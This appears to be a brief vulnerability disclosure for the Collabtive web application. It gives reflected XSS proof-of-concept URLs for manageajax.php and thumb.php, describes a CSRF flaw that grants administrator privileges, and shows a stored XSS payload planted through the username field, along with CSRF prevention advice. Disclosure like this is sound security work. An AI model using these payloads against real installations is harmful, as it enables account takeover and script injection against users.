Exploit/POC: http://target/manageajax.php?action=newcal&y=<script>alert(/XSS/)</script> http://target/thumb.php?pic=<script>alert(/XSS/)</script>
Description: Collabtive affects from Cross-site Request Forgery. Technically, attacker can create a specially crafted page and force collabtive administrators to visit it and can gain administrative privilege. For prevention from CSRF vulnerabilities, application needs anti-csrf token, captcha and asking old password for critical actions.
Description: Collabtive has Stored Cross-site Scripting vulnerability. Every user can change their usernames and application allows HTML codes and stores in database.
Exploit/POC: Change username to "user<script>alert(/AS/)</script>".